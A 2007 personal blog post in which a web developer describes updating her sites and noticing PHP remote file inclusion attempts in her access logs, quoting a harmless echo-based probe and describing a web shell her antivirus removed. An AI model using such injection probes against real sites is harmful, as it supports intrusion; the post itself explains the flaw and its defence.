3rd May, 2007
Hack Attack!
Thursday, 3:26 pm in CodeGirl
So yesterday I went around and randomly tidied up a bit of the old code here at void-star.net; mostly putting in meta tags and correct DOCTYPEs. It occurred to me that while the main page here is a Googlewhore, very few of my other sites get hits.
One of the sites I tidied up a bit was sk.ODE, my itty bitty scripts distribution site. Firstly I went through and converted my old tag soup HTML to super-fun-happy strict XHTML. I’m not sure why I chose XHTML, now that I think about it. Somewhere along the line I became a convert to the strict DOCTYPEs since it makes code so much neater and when it comes down to it I’m hugely anal retentive about some things. However, my weapon of choice is HTML, not XHTML, mostly because I’m one of those people who sides with Hickson over Zeldman when it comes to serving XHTML as text/html. But that’s neither here nor there.
One of the things I did do was put up the sk.hits script. This is something I ripped out of sk.log originally for the purpose of tracking visitors to furc!Loki's character profile. The popularity of massive, heavy-handed scripts like Mint aside, I’m one of those oldskool souls who prefers neat little lightweight trackers (plus Mint uses depreciated JavaScript that breaks if you’re serving XHTML correctly). While I was at it, I put two more installs of sk.hits up at the domain; one to cover the collective and one to cover sk.ODE itself. Uh-oh, problemo; v1.0 of sk.ring uses mysql_pconnect() which doesn’t play well with sk.hits (unless they’re in the same database, which they aren’t). So I wrote v1.1 which forces a new MySQL connection for its exclusive use, and started running it in parallel with the tracker at Uncreative.
All was well. I even put all the RSS feeds for the trackers up on my Ajax homepage because I am a chronic e-stalker.
And then I saw something interesting; someone accessing my site using an off-site URL as the query string. Now, I’m not an idiot and I know what this is; it’s an injection attempt. It’s for those people who – as I did, once upon an Intrawebs – use query string includes where the query string is the name of the file being included. This is one of the biggest no-nos in PHP, but you’d despair at how many scripts and sites do it. Luckily, my sites use a switch()-based includes system (it’s on sk.ODE if you’re curious, but it’s nothing new really) so don’t suffer from this particular security flaw. But there it was, right in my logs.
The first attempt was pretty basic, and more of a proof of concept rather than anything actually dangerous.
<?php
echo "424242424xxx"."xxx424242424";
?>
I was much more interested in the second attempt (the script seems to have either killed itself on the host server or my AV is blocking it; I didn’t even manage to save it), however. I think was a PHP-based shell script; the desktop AV picked it up as a “PHP injection script” and deleted it from cache instantly. This kind of thing is much more malicious, and lets someone execute OS-level commands; essentially it turns your hijacked web page into a terminal. The last time I saw one – much more simple that thing but just as devastating – was way way back on a friend’s old Greymatter blog. Her domain account had been banned since someone had hijacked Greymatter, uploaded a shell script1 and was running an IRC bot. In a way, this script is even nastier since it’s non-permanent and will clean itself up when the hijacker leaves the page. As to what you can actually do with it… well, it depends on how your webserver is set up, and what user/group the webserver runs under, but at best they can vandalise your site and at worst they can infect the whole server.
I dunno, it didn’t do anything but I guess it was just interesting. I’ve never watched myself be the target of a hack before…
- Most domain hosts will insta-ban your account if they detect you’re running such a script. ^
- Mood » curious
- « Previous
- Next »